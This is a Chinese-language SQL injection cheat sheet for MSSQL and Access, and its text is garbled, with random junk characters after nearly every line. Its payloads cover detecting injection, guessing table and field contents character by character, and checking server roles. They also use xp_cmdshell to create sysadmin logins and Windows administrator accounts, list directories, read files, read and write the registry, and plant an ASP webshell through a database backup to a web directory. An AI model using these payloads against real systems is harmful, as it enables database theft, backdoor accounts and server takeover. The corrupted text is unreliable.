1.判断是否有注入;and 1=1 ;and 1=2 2E7vuFH4c
2.初步判断是否是mssql ;and user>0 &gGh%:`B
nSR7$yS_
3.注入参数是字符'and [查询条件] and ''=' 9=RfGx
A:Y
([
4.搜索时没过滤参数的'and [查询条件] and '%25'=' +8p4\l$<`
pSMF1Oy
5.判断数据库系统 FLf< gz
GS_+KR\
;and (select count(*) from sysobjects)>0 mssql tE=;V) %we
<yt|!p-tS
;and (select count(*) from msysobjects)>0 access #7(?B{i
"wqN,}bj\
%BBM%Lj
}KFf
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Hst]}g' .
*n]f) Jc
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 )DG>omCY
naOCa
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
yn`P:[v
7# !RX3
9.(1)猜字段的ascii值(access) *m$lAWB5D
nLvF^%P8
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 9pF@#A9p
<?8aM7W7
(2)猜字段的ascii值(mssql) z.d1>w
`_;sT8
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ?F=^&
v8
L<dJWxf?D
10.测试权限结构(mssql) 1 >}x9D
b9Fd}WZz
STln_'DF'
GycW3tc]_&
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- YmwUl> @{
"/ 9EUbca
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- IJ[r!&PY
u$M,&Om
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- MJ.K,e
]0dj##5tJ
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ),!1B%
4>t'4p6{
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- NNgpDL*
d94Le/E
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- [aS<u`/g|
/}kG$~
;and 1=(select IS_MEMBER('db_owner'));-- 1SK|4Am
T%Nm
VZ3{$0
+
chC= $(5t
11.添加mssql和系统的帐户 iZ( U]
hj4mbL
;exec master.dbo.sp_addlogin username;-- >.=v*\P
;exec master.dbo.sp_password null,username,password;-- ~[@gu,Wb
1OI/,y8}
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- %iq8dAW%
,wYA_1$$H
;exec master.dbo.xp_cmdshell 'net user username password G^%FP!'D?
ASU.VY
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 6k9cvMs%H
Abc%VRsT
;exec master.dbo.xp_cmdshell 'net user username password /add';-- }nx5
2 ":W^P
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- $o%:ST4
*,FU*zi
p6c&vEsNj
rNN,!
12.(1)遍历目录 ZBuh(be
I83 _x|$FZ
;create table dirs(paths varchar(100), id int) =@ d/SZ|(E
+R2+?v6
;insert dirs exec master.dbo.xp_dirtree 'c:\' zL!}YR@&u"
}bZb8hiG
;and (select top 1 paths from dirs)>0 6>NK2} `
7U1^=Y@t}
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Ud& '*,
SpC6dkxD\
Zg&o][T
5ktFL<^5T
(2)遍历目录 &dky_H
)#l&BV5
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Qf($F,)K
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Tf40lv+{
+5x{|!Pn
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 c5(4rT{(m
-, uT8'
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 6L<QKE=
0[ZB ^
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Vji:,k=3\
(B0QBDj!
n{I1ZlEeh
F4]=(T
13.mssql中的存储过程 B|K^:LUk9
Mx Dqp;
xp_regenumvalues 注册表根键, 子键 DX_?-jw})f
VA5f+c/ %
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 v^dQ%+}7>
jG`,k*eUrJ
xp_regread 根键,子键,键值名 Bn{i+8I
d7G
DIYH<
;exec xp_regread Q9Vj8JO"{
4Opf[3]
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 4I8QM&7
wvmcD%
xp_regwrite 根键,子键, 值名, 值类型, 值 w0X})&,{`m
FQ"ED:lks
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 = N^Ec[u(l
VVbFn9+V
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 jqlfypU
q"i]&dMr
xp_regdeletevalue 根键,子键,值名 VCzb[.
G
2`hEX%
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ++ZP
X'|
${e5Ka
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 hmB`+?,z*
@<3kj
R?j
twhT6wz"
;+1ooeU
14.mssql的backup创建webshell cB)tfS4)
pJJOy
use model >Cam6LJ
udS&$/&GH
create table cmd(str image); y&V%xE/
+4+czfz
insert into cmd(str) values (''); i9|}-5ED
L d{`k
backup database model to disk='c:\l.asp'; '~VF*i^4
rZ&li/Z
"E@A~<RKP
z31g"
15.mssql内置函数 nRyx2\Py+
6rM{r>
;and (select @@version)>0 获得Windows的版本号 vVZ+u4y
\opcn\vW
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
ZH<qidpR
Qxfds`4V9i
;and (select user_name())>0 爆当前系统的连接用户 55ft,a
U]W"
;and (select db_name())>0 得到当前连接的数据库 {55f{5y3
c
H<tU[U=G
klMpiy
KGGnypx`
16.简洁的webshell 6tGF
0p+36g
use model kjDmwa+91T
'w=aLu5dY
create table cmd(str image); >2v<;.
CzIs_/
insert into cmd(str) values (''); 2%|n}V[
4+89 M
backup database model to disk='g:\wwwtest\l.asp';